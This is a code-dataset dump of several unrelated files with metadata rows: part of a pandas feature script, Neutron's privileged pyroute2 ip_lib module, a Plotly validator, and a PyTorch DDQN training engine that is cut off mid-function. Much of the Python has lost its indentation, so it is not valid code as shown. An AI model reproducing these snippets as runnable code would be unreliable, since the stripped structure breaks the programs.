new_df = pd.DataFrame(index = feature_df.index)
#create 30 models
for d in range(30):
for cols in feature_df:
#30 days features
new_df[cols+'#%d'%d] = feature_df[cols]
feature_df.index -= pd.Timedelta('1D')
new_df = new_df.dropna()
save_history_df(new_df.dropna(),user_id)
return new_df
def make_history_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption
for user_id in get_user_id_list():
print user_id
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
p.apply_async(make_history_month_features,args=(arg))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
if __name__ == '__main__':
make_month_features_all()
#make_history_month_features_all()
| 32.835616
| 93
| 0.666458
|
fcf4889933740a449feedd6cfb64149050165b8f
| 25,122
|
py
|
Python
|
neutron/privileged/agent/linux/ip_lib.py
|
1pintbeer/neutron
|
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
|
[
"Apache-2.0"
] | null | null | null |
neutron/privileged/agent/linux/ip_lib.py
|
1pintbeer/neutron
|
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
|
[
"Apache-2.0"
] | null | null | null |
neutron/privileged/agent/linux/ip_lib.py
|
1pintbeer/neutron
|
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import functools
import os
import socket
from neutron_lib import constants
from oslo_concurrency import lockutils
import pyroute2
from pyroute2 import netlink
from pyroute2.netlink import exceptions as netlink_exceptions
from pyroute2.netlink import rtnl
from pyroute2.netlink.rtnl import ifinfmsg
from pyroute2.netlink.rtnl import ndmsg
from pyroute2 import NetlinkError
from pyroute2 import netns
import six
from neutron._i18n import _
from neutron import privileged
_IP_VERSION_FAMILY_MAP = {4: socket.AF_INET, 6: socket.AF_INET6}
NETNS_RUN_DIR = '/var/run/netns'
# NOTE(slaweq): Because of issue with pyroute2.NetNS objects running in threads
# we need to lock this function to workaround this issue.
# For details please check https://bugs.launchpad.net/neutron/+bug/1811515
def _sync(input_func):
    # NOTE(ralonsoh): this is needed because PY2 functools.update_wrapper do
    # not handle correctly partial functions (nested decorators). This could be
    # removed once we abandon support for PY2.
    if six.PY2 and isinstance(input_func, functools.partial):
        for asig in functools.WRAPPER_ASSIGNMENTS:
            setattr(input_func, asig, '')
    @six.wraps(input_func)
    @lockutils.synchronized("privileged-ip-lib")
    def sync_inner(*args, **kwargs):
        return input_func(*args, **kwargs)
    return sync_inner
def _get_scope_name(scope):
"""Return the name of the scope (given as a number), or the scope number
if the name is unknown.
For backward compatibility (with "ip" tool) "global" scope is converted to
"universe" before converting to number
"""
scope = 'universe' if scope == 'global' else scope
return rtnl.rt_scope.get(scope, scope)
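# Illustrative mapping (added note, based on pyroute2's rt_scope table; values
# quoted from the rtnetlink constants): _get_scope_name('global') and
# _get_scope_name('universe') both return 0, _get_scope_name('link') returns
# 253, and a scope that is already numeric or unknown is returned unchanged.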
class NetworkNamespaceNotFound(RuntimeError):
message = _("Network namespace %(netns_name)s could not be found.")
def __init__(self, netns_name):
super(NetworkNamespaceNotFound, self).__init__(
self.message % {'netns_name': netns_name})
class NetworkInterfaceNotFound(RuntimeError):
message = _("Network interface %(device)s not found in namespace "
"%(namespace)s.")
def __init__(self, message=None, device=None, namespace=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {
'device': device, 'namespace': namespace}
super(NetworkInterfaceNotFound, self).__init__(message)
class InterfaceOperationNotSupported(RuntimeError):
message = _("Operation not supported on interface %(device)s, namespace "
"%(namespace)s.")
def __init__(self, message=None, device=None, namespace=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {
'device': device, 'namespace': namespace}
super(InterfaceOperationNotSupported, self).__init__(message)
class IpAddressAlreadyExists(RuntimeError):
message = _("IP address %(ip)s already configured on %(device)s.")
def __init__(self, message=None, ip=None, device=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {'ip': ip, 'device': device}
super(IpAddressAlreadyExists, self).__init__(message)
class InterfaceAlreadyExists(RuntimeError):
message = _("Interface %(device)s already exists.")
def __init__(self, message=None, device=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {'device': device}
super(InterfaceAlreadyExists, self).__init__(message)
def _make_route_dict(destination, nexthop, device, scope):
return {'destination': destination,
'nexthop': nexthop,
'device': device,
'scope': scope}
@_sync
@privileged.default.entrypoint
def get_routing_table(ip_version, namespace=None):
"""Return a list of dictionaries, each representing a route.
:param ip_version: IP version of routes to return, for example 4
:param namespace: The name of the namespace from which to get the routes
:return: a list of dictionaries, each representing a route.
The dictionary format is: {'destination': cidr,
'nexthop': ip,
'device': device_name,
'scope': scope}
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
netns = pyroute2.NetNS(namespace, flags=0) if namespace else None
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
routes = []
with pyroute2.IPDB(nl=netns) as ipdb:
ipdb_routes = ipdb.routes
ipdb_interfaces = ipdb.interfaces
for route in ipdb_routes:
if route['family'] != family:
continue
dst = route['dst']
nexthop = route.get('gateway')
oif = route.get('oif')
scope = _get_scope_name(route['scope'])
# If there is not a valid outgoing interface id, check if
# this is a multipath route (i.e. same destination with
# multiple outgoing interfaces)
if oif:
device = ipdb_interfaces[oif]['ifname']
rt = _make_route_dict(dst, nexthop, device, scope)
routes.append(rt)
elif route.get('multipath'):
for mpr in route['multipath']:
oif = mpr['oif']
device = ipdb_interfaces[oif]['ifname']
rt = _make_route_dict(dst, nexthop, device, scope)
routes.append(rt)
return routes
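# Hedged usage sketch (added illustration; the namespace and device names are
# placeholders): get_routing_table(4, namespace='qrouter-example') could
# return, for instance,
#   [{'destination': '10.0.0.0/24', 'nexthop': None,
#     'device': 'qr-0123abcd', 'scope': 'link'},
#    {'destination': 'default', 'nexthop': '10.0.0.1',
#     'device': 'qg-4567efgh', 'scope': 'universe'}]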
def get_iproute(namespace):
# From iproute.py:
# `IPRoute` -- RTNL API to the current network namespace
# `NetNS` -- RTNL API to another network namespace
if namespace:
# do not try and create the namespace
return pyroute2.NetNS(namespace, flags=0)
else:
return pyroute2.IPRoute()
@_sync
@privileged.default.entrypoint
def open_namespace(namespace):
"""Open namespace to test if the namespace is ready to be manipulated"""
with pyroute2.NetNS(namespace, flags=0):
pass
@privileged.default.entrypoint
def list_ns_pids(namespace):
"""List namespace process PIDs
Based on Pyroute2.netns.ns_pids(). Remove when
https://github.com/svinota/pyroute2/issues/633 is fixed.
"""
ns_pids = []
try:
ns_path = os.path.join(NETNS_RUN_DIR, namespace)
ns_inode = os.stat(ns_path).st_ino
except OSError:
return ns_pids
for pid in os.listdir('/proc'):
if not pid.isdigit():
continue
try:
pid_path = os.path.join('/proc', pid, 'ns', 'net')
if os.stat(pid_path).st_ino == ns_inode:
ns_pids.append(int(pid))
except OSError:
continue
return ns_pids
def _translate_ip_device_exception(e, device=None, namespace=None):
if e.code == errno.ENODEV:
raise NetworkInterfaceNotFound(device=device, namespace=namespace)
if e.code == errno.EOPNOTSUPP:
raise InterfaceOperationNotSupported(device=device,
namespace=namespace)
def get_link_id(device, namespace):
try:
with get_iproute(namespace) as ip:
return ip.link_lookup(ifname=device)[0]
except IndexError:
raise NetworkInterfaceNotFound(device=device, namespace=namespace)
def _run_iproute_link(command, device, namespace=None, **kwargs):
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
return ip.link(command, index=idx, **kwargs)
except NetlinkError as e:
_translate_ip_device_exception(e, device, namespace)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def _run_iproute_neigh(command, device, namespace, **kwargs):
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
return ip.neigh(command, ifindex=idx, **kwargs)
except NetlinkError as e:
_translate_ip_device_exception(e, device, namespace)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def _run_iproute_addr(command, device, namespace, **kwargs):
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
return ip.addr(command, index=idx, **kwargs)
except NetlinkError as e:
_translate_ip_device_exception(e, device, namespace)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def add_ip_address(ip_version, ip, prefixlen, device, namespace, scope,
broadcast=None):
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
_run_iproute_addr('add',
device,
namespace,
address=ip,
mask=prefixlen,
family=family,
broadcast=broadcast,
scope=_get_scope_name(scope))
except NetlinkError as e:
if e.code == errno.EEXIST:
raise IpAddressAlreadyExists(ip=ip, device=device)
raise
@_sync
@privileged.default.entrypoint
def delete_ip_address(ip_version, ip, prefixlen, device, namespace):
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
_run_iproute_addr("delete",
device,
namespace,
address=ip,
mask=prefixlen,
family=family)
except NetlinkError as e:
# when trying to delete a non-existent IP address, pyroute2 raises
# NetlinkError with code EADDRNOTAVAIL (99, 'Cannot assign requested
# address')
# this shouldn't raise an error
if e.code == errno.EADDRNOTAVAIL:
return
raise
@_sync
@privileged.default.entrypoint
def flush_ip_addresses(ip_version, device, namespace):
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
ip.flush_addr(index=idx, family=family)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def create_interface(ifname, namespace, kind, **kwargs):
ifname = ifname[:constants.DEVICE_NAME_MAX_LEN]
try:
with get_iproute(namespace) as ip:
physical_interface = kwargs.pop("physical_interface", None)
if physical_interface:
link_key = "vxlan_link" if kind == "vxlan" else "link"
kwargs[link_key] = get_link_id(physical_interface, namespace)
return ip.link("add", ifname=ifname, kind=kind, **kwargs)
except NetlinkError as e:
if e.code == errno.EEXIST:
raise InterfaceAlreadyExists(device=ifname)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def delete_interface(ifname, namespace, **kwargs):
_run_iproute_link("del", ifname, namespace, **kwargs)
@_sync
@privileged.default.entrypoint
def interface_exists(ifname, namespace):
try:
idx = get_link_id(ifname, namespace)
return bool(idx)
except NetworkInterfaceNotFound:
return False
except OSError as e:
if e.errno == errno.ENOENT:
return False
raise
@_sync
@privileged.default.entrypoint
def set_link_flags(device, namespace, flags):
link = _run_iproute_link("get", device, namespace)[0]
new_flags = flags | link['flags']
return _run_iproute_link("set", device, namespace, flags=new_flags)
@_sync
@privileged.default.entrypoint
def set_link_attribute(device, namespace, **attributes):
return _run_iproute_link("set", device, namespace, **attributes)
@_sync
@privileged.default.entrypoint
def get_link_attributes(device, namespace):
link = _run_iproute_link("get", device, namespace)[0]
return {
'mtu': link.get_attr('IFLA_MTU'),
'qlen': link.get_attr('IFLA_TXQLEN'),
'state': link.get_attr('IFLA_OPERSTATE'),
'qdisc': link.get_attr('IFLA_QDISC'),
'brd': link.get_attr('IFLA_BROADCAST'),
'link/ether': link.get_attr('IFLA_ADDRESS'),
'alias': link.get_attr('IFLA_IFALIAS'),
'allmulticast': bool(link['flags'] & ifinfmsg.IFF_ALLMULTI),
'link_kind': link.get_nested('IFLA_LINKINFO', 'IFLA_INFO_KIND')
}
@_sync
@privileged.default.entrypoint
def add_neigh_entry(ip_version, ip_address, mac_address, device, namespace,
**kwargs):
"""Add a neighbour entry.
:param ip_address: IP address of entry to add
:param mac_address: MAC address of entry to add
:param device: Device name to use in adding entry
:param namespace: The name of the namespace in which to add the entry
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
_run_iproute_neigh('replace',
device,
namespace,
dst=ip_address,
lladdr=mac_address,
family=family,
state=ndmsg.states['permanent'],
**kwargs)
@_sync
@privileged.default.entrypoint
def delete_neigh_entry(ip_version, ip_address, mac_address, device, namespace,
**kwargs):
"""Delete a neighbour entry.
:param ip_address: IP address of entry to delete
:param mac_address: MAC address of entry to delete
:param device: Device name to use in deleting entry
:param namespace: The name of the namespace in which to delete the entry
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
_run_iproute_neigh('delete',
device,
namespace,
dst=ip_address,
lladdr=mac_address,
family=family,
**kwargs)
except NetlinkError as e:
# trying to delete a non-existent entry shouldn't raise an error
if e.code == errno.ENOENT:
return
raise
@_sync
@privileged.default.entrypoint
def dump_neigh_entries(ip_version, device, namespace, **kwargs):
"""Dump all neighbour entries.
:param ip_version: IP version of entries to show (4 or 6)
:param device: Device name to use in dumping entries
:param namespace: The name of the namespace in which to dump the entries
:param kwargs: Callers add any filters they use as kwargs
:return: a list of dictionaries, each representing a neighbour.
The dictionary format is: {'dst': ip_address,
'lladdr': mac_address,
'device': device_name}
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
entries = []
dump = _run_iproute_neigh('dump',
device,
namespace,
family=family,
**kwargs)
for entry in dump:
attrs = dict(entry['attrs'])
entries += [{'dst': attrs['NDA_DST'],
'lladdr': attrs.get('NDA_LLADDR'),
'device': device}]
return entries
@privileged.default.entrypoint
def create_netns(name, **kwargs):
"""Create a network namespace.
:param name: The name of the namespace to create
"""
try:
netns.create(name, **kwargs)
except OSError as e:
if e.errno != errno.EEXIST:
raise
@privileged.default.entrypoint
def remove_netns(name, **kwargs):
"""Remove a network namespace.
:param name: The name of the namespace to remove
"""
try:
netns.remove(name, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
@privileged.default.entrypoint
def list_netns(**kwargs):
"""List network namespaces.
    Caller requires raised privileges to list namespaces
"""
return netns.listnetns(**kwargs)
def make_serializable(value):
"""Make a pyroute2 object serializable
This function converts 'netlink.nla_slot' object (key, value) in a list
of two elements.
"""
def _ensure_string(value):
        # NOTE(ralonsoh): once PY2 is deprecated, the str() conversion will no
        # longer be needed and six.binary_type --> bytes.
return (str(value.decode('utf-8'))
if isinstance(value, six.binary_type) else value)
if isinstance(value, list):
return [make_serializable(item) for item in value]
elif isinstance(value, netlink.nla_slot):
return [value[0], make_serializable(value[1])]
elif isinstance(value, netlink.nla_base) and six.PY3:
return make_serializable(value.dump())
elif isinstance(value, dict):
return {_ensure_string(key): make_serializable(data)
for key, data in value.items()}
elif isinstance(value, tuple):
return tuple(make_serializable(item) for item in value)
return _ensure_string(value)
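# Illustration of the conversion above (added note, schematic only): a netlink
# attribute slot ('IFLA_IFNAME', 'eth0') arriving as a netlink.nla_slot becomes
# the plain list ['IFLA_IFNAME', 'eth0'], nested nla messages are replaced by
# their dump()ed contents, byte strings are decoded to str, and dicts/tuples
# are rebuilt recursively so the result can cross the privsep boundary as
# primitive, serializable types.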
@_sync
@privileged.default.entrypoint
def get_link_devices(namespace, **kwargs):
"""List interfaces in a namespace
:return: (list) interfaces in a namespace
"""
try:
with get_iproute(namespace) as ip:
return make_serializable(ip.get_links(**kwargs))
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def get_device_names(namespace, **kwargs):
"""List interface names in a namespace
:return: a list of strings with the names of the interfaces in a namespace
"""
devices_attrs = [link['attrs'] for link
in get_link_devices(namespace, **kwargs)]
device_names = []
for device_attrs in devices_attrs:
for link_name in (link_attr[1] for link_attr in device_attrs
if link_attr[0] == 'IFLA_IFNAME'):
device_names.append(link_name)
return device_names
@_sync
@privileged.default.entrypoint
def get_ip_addresses(namespace, **kwargs):
"""List of IP addresses in a namespace
:return: (tuple) IP addresses in a namespace
"""
try:
with get_iproute(namespace) as ip:
return make_serializable(ip.get_addr(**kwargs))
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def list_ip_rules(namespace, ip_version, match=None, **kwargs):
"""List all IP rules"""
try:
with get_iproute(namespace) as ip:
rules = make_serializable(ip.get_rules(
family=_IP_VERSION_FAMILY_MAP[ip_version],
match=match, **kwargs))
for rule in rules:
rule['attrs'] = {
key: value for key, value
in ((item[0], item[1]) for item in rule['attrs'])}
return rules
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def add_ip_rule(namespace, **kwargs):
"""Add a new IP rule"""
try:
with get_iproute(namespace) as ip:
ip.rule('add', **kwargs)
except netlink_exceptions.NetlinkError as e:
if e.code == errno.EEXIST:
return
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def delete_ip_rule(namespace, **kwargs):
"""Delete an IP rule"""
try:
with get_iproute(namespace) as ip:
ip.rule('del', **kwargs)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def _make_pyroute2_route_args(namespace, ip_version, cidr, device, via, table,
metric, scope, protocol):
"""Returns a dictionary of arguments to be used in pyroute route commands
:param namespace: (string) name of the namespace
:param ip_version: (int) [4, 6]
:param cidr: (string) source IP or CIDR address (IPv4, IPv6)
:param device: (string) input interface name
:param via: (string) gateway IP address
:param table: (string, int) table number or name
:param metric: (int) route metric
:param scope: (int) route scope
:param protocol: (string) protocol name (pyroute2.netlink.rtnl.rt_proto)
:return: a dictionary with the kwargs needed in pyroute rule commands
"""
args = {'family': _IP_VERSION_FAMILY_MAP[ip_version]}
if not scope:
scope = 'global' if via else 'link'
scope = _get_scope_name(scope)
if scope:
args['scope'] = scope
if cidr:
args['dst'] = cidr
if device:
args['oif'] = get_link_id(device, namespace)
if via:
args['gateway'] = via
if table:
args['table'] = int(table)
if metric:
args['priority'] = int(metric)
if protocol:
args['proto'] = protocol
return args
@_sync
@privileged.default.entrypoint
def add_ip_route(namespace, cidr, ip_version, device=None, via=None,
table=None, metric=None, scope=None, **kwargs):
"""Add an IP route"""
kwargs.update(_make_pyroute2_route_args(
namespace, ip_version, cidr, device, via, table, metric, scope,
'static'))
try:
with get_iproute(namespace) as ip:
ip.route('replace', **kwargs)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def list_ip_routes(namespace, ip_version, device=None, table=None, **kwargs):
"""List IP routes"""
kwargs.update(_make_pyroute2_route_args(
namespace, ip_version, None, device, None, table, None, None, None))
try:
with get_iproute(namespace) as ip:
return make_serializable(ip.route('show', **kwargs))
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def delete_ip_route(namespace, cidr, ip_version, device=None, via=None,
table=None, scope=None, **kwargs):
"""Delete an IP route"""
kwargs.update(_make_pyroute2_route_args(
namespace, ip_version, cidr, device, via, table, None, scope, None))
try:
with get_iproute(namespace) as ip:
ip.route('del', **kwargs)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
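# --- Hedged usage sketch (added illustration, not part of the original module) ---
# These privileged entrypoints are normally reached through
# neutron.agent.linux.ip_lib; the namespace, device and addresses below are
# placeholders only.
#   add_ip_route('qrouter-example', '0.0.0.0/0', 4,
#                device='qg-4567efgh', via='10.0.0.1')
#   list_ip_routes('qrouter-example', 4)
#   delete_ip_route('qrouter-example', '0.0.0.0/0', 4, via='10.0.0.1')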
| 33.948649
| 79
| 0.638405
|
9f89fc5e16180695eccef0483180176338191822
| 526
|
py
|
Python
|
plotly/validators/histogram2d/colorbar/_showexponent.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/histogram2d/colorbar/_showexponent.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | null | null | null |
plotly/validators/histogram2d/colorbar/_showexponent.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class ShowexponentValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name='showexponent',
parent_name='histogram2d.colorbar',
**kwargs
):
super(ShowexponentValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
role='style',
values=['all', 'first', 'last', 'none'],
**kwargs
)
| 26.3
| 78
| 0.60076
|
2a5cdb47300e78039ff43dddd59df2d712c72610
| 18,528
|
py
|
Python
|
pterotactyl/policies/DDQN/train.py
|
maurock/Active-3D-Vision-and-Touch
|
39e24de0ad3c3caad5d78b7cb351e95d4691c88c
|
[
"MIT"
] | 10
|
2021-10-29T18:04:03.000Z
|
2022-03-22T11:42:13.000Z
|
pterotactyl/policies/DDQN/train.py
|
maurock/Active-3D-Vision-and-Touch
|
39e24de0ad3c3caad5d78b7cb351e95d4691c88c
|
[
"MIT"
] | null | null | null |
pterotactyl/policies/DDQN/train.py
|
maurock/Active-3D-Vision-and-Touch
|
39e24de0ad3c3caad5d78b7cb351e95d4691c88c
|
[
"MIT"
] | 3
|
2021-11-05T16:45:27.000Z
|
2021-12-22T12:53:06.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data import DataLoader
import torch
import argparse
from submitit.helpers import Checkpointable
from tqdm import tqdm
from pterotactyl.policies.DDQN import ddqn
from pterotactyl.policies import environment
from pterotactyl.policies import replay
from pterotactyl.utility import utils
from pterotactyl import pretrained
# module for training the DDQN models
class Engine(Checkpointable):
def __init__(self, args):
self.args = args
self.steps = 0
self.episode = 0
self.epoch = 0
self.cur_loss = 10000
self.best_loss = 10000
self.epsilon = self.args.epsilon_start
self.results_dir = os.path.join("results", args.exp_type, args.exp_id)
if not os.path.exists(self.results_dir):
os.makedirs(self.results_dir)
self.checkpoint_dir = os.path.join(
"experiments/checkpoint/", self.args.exp_type, self.args.exp_id
)
if not os.path.exists((self.checkpoint_dir)):
os.makedirs(self.checkpoint_dir)
utils.save_config(self.checkpoint_dir, args)
def __call__(self):
# initialize the learning environment
self.env = environment.ActiveTouch(self.args)
self.replay_memory = replay.ReplayMemory(self.args)
self.policy = ddqn.DDQN(self.args, self.env.mesh_info, self.replay_memory)
self.target_net = ddqn.DDQN(self.args, self.env.mesh_info, None)
self.target_net.load_state_dict(self.policy.state_dict())
self.target_net.eval()
self.writer = SummaryWriter(
os.path.join("experiments/tensorboard/", self.args.exp_type)
)
self.window_size = 1000
self.ave_reward = torch.zeros((self.window_size)).cuda()
self.ave_recon = torch.zeros((self.window_size)).cuda()
train_loader, valid_loaders = self.get_loaders()
if self.args.eval:
self.load(best=True)
self.validate(valid_loaders)
return
self.resume()
# training loop
for epoch in range(self.epoch, self.args.epochs):
self.train(train_loader)
self.env.reset_pybullet()
if self.steps >= self.args.burn_in:
with torch.no_grad():
self.validate(valid_loaders)
self.env.reset_pybullet()
self.check_values_and_save()
self.epoch += 1
# load the environment data into pytorch dataloaders
def get_loaders(self):
if self.args.eval:
train_loader = ""
else:
train_loader = DataLoader(
self.env.train_data,
batch_size=self.args.env_batch_size,
shuffle=True,
num_workers=4,
collate_fn=self.env.train_data.collate,
)
valid_loader = DataLoader(
self.env.valid_data,
batch_size=self.args.env_batch_size,
shuffle=False,
num_workers=4,
collate_fn=self.env.valid_data.collate,
)
return train_loader, valid_loader
# training iteration
def train(self, dataloader):
for v, batch in enumerate(tqdm(dataloader, total=self.args.train_steps)):
if v > self.args.train_steps - 1:
break
obs = self.env.reset(batch)
all_done = False
total_reward = 0
while not all_done:
# update epsilon
if self.steps >= self.args.burn_in:
self.epsilon = self.policy.update_epsilon(self.epsilon, self.args)
# get action
get_random_action = self.steps < self.args.burn_in
action = self.policy.get_action(
obs, eps_threshold=self.epsilon, give_random=get_random_action
)
# perform action
with torch.no_grad():
next_obs, reward, all_done = self.env.step(action)
                # save experience
self.policy.add_experience(action, obs, next_obs, reward)
# update policy
if self.steps >= self.args.burn_in:
self.policy.update_parameters(self.target_net)
# update target network
if (
self.steps % self.args.target_update == 0
and self.steps >= self.args.burn_in
):
print("+" * 5 + " updating target " "+" * 5)
self.target_net.load_state_dict(self.policy.state_dict())
torch.cuda.empty_cache()
obs = next_obs
self.steps += 1
# logs
recon = float((obs["score"] / obs["first_score"]).mean().item())
reward = float(
((obs["first_score"] - obs["score"]) / obs["first_score"]).mean().item()
)
self.ave_reward[self.episode % self.window_size] = reward
self.ave_recon[self.episode % self.window_size] = float(
(obs["score"] / obs["first_score"]).mean().item()
)
ave_reward = self.ave_reward[: self.episode + 1].mean()
ave_recon = self.ave_recon[: self.episode + 1].mean()
message = (
f"T Epoch: {self.epoch} Ep: {self.episode}, recon: {recon:.2f}, "
f"reward: {reward:.2f}, a_recon: {ave_recon:.2f}, a_reward: {ave_reward:.2f}, "
f" eps: {self.epsilon:.3f}, best: {self.best_loss:.3f}"
)
tqdm.write(message)
self.episode += 1
# logs
if self.steps >= self.args.burn_in:
self.writer.add_scalars(
"train_recon_|_", {self.args.exp_id: ave_recon}, self.steps
)
self.writer.add_scalars(
"train_reward_|_", {self.args.exp_id: ave_reward}, self.steps
)
# validation iteration
def validate(self, dataloader):
observations = []
scores = []
actions = []
names = []
print("*" * 30)
print("Doing Validation")
total = self.args.train_steps if not self.args.eval else None
for v, batch in enumerate(tqdm(dataloader, total=total)):
names += batch["names"]
if v > self.args.valid_steps - 1 and not self.args.eval:
break
obs = self.env.reset(batch)
all_done = False
cur_scores = [obs["score"]]
cur_actions = []
while not all_done:
# select actions
action = self.policy.get_action(
obs, eps_threshold=-1, give_random=False
)
# perform actions
with torch.no_grad():
next_obs, reward, all_done = self.env.step(action)
# record actions
torch.cuda.empty_cache()
obs = next_obs
cur_scores.append(obs["score"])
cur_actions.append(torch.FloatTensor(action))
observations.append(obs["mesh"])
scores.append(torch.stack(cur_scores).permute(1, 0))
actions.append(torch.stack(cur_actions).permute(1, 0))
print_score = (scores[-1][:, -1] / scores[-1][:, 0]).mean()
print_reward = (
(scores[-1][:, 0] - scores[-1][:, -1]) / scores[-1][:, 0]
).mean()
message = f"Valid || E: {self.epoch}, score: {print_score:.2f}, best score: {self.best_loss:.2f} "
message += f"reward = {print_reward:.2f}"
tqdm.write(message)
if self.args.visualize and v == 5 and self.args.eval:
meshes = torch.cat(observations, dim=0)[:, :, :3]
utils.visualize_prediction(
self.results_dir, meshes, self.env.mesh_info["faces"], names
)
self.env.reset_pybullet()
scores = torch.cat(scores)
actions = torch.cat(actions)
rewards = ((scores[:, 0] - scores[:, -1]) / scores[:, 0]).mean()
variation = torch.std(actions, dim=0).mean()
self.current_loss = (scores[:, -1] / scores[:, 0]).mean()
print("*" * 30)
message = f"Total Valid || E: {self.epoch}, score: {self.current_loss:.4f}, best score: {self.best_loss:.4f} "
message += f"reward = {rewards.mean():.2f}"
tqdm.write("*" * len(message))
tqdm.write(message)
tqdm.write("*" * len(message))
if not self.args.eval:
self.writer.add_scalars(
f"Valid_recon_|_", {self.args.exp_id: self.current_loss}, self.steps
)
self.writer.add_scalars(
f"Valid_reward_|_", {self.args.exp_id: rewards.mean()}, self.steps
)
self.writer.add_scalars(
"epsilon_|_", {self.args.exp_id: self.epsilon}, self.steps
)
self.writer.add_scalars(
f"Valid_variation_|_", {self.args.exp_id: variation}, self.steps
)
if self.args.visualize and self.args.eval:
utils.visualize_actions(self.results_dir, actions, self.args)
    # check if the new validation score is better and save a checkpoint
def check_values_and_save(self):
if self.best_loss >= self.current_loss:
improvement = self.best_loss - self.current_loss
print(
f"Saving with {improvement:.3f} improvement in Chamfer Distance on Validation Set "
)
self.best_loss = self.current_loss
self.save(best=True)
print(f"Saving DQN checkpoint")
self.save(best=False)
print("Saving replay memory.")
self.replay_memory.save(self.checkpoint_dir)
# resume training
def resume(self):
path = self.checkpoint_dir + "/recent"
if os.path.exists(path + "_model"):
print(f"Loading DQN checkpoint")
self.load(best=False)
print("Loading replay memory.")
self.replay_memory.load(path)
# save current state of training
def save(self, best=False):
if best:
path = self.checkpoint_dir + "/best"
else:
path = self.checkpoint_dir + "/recent"
self.replay_memory.save(path)
torch.save(
{
"dqn_weights": self.policy.state_dict(),
"target_weights": self.target_net.state_dict(),
"args": self.args,
"episode": self.episode,
"steps": self.steps,
"ave_reward": self.ave_reward,
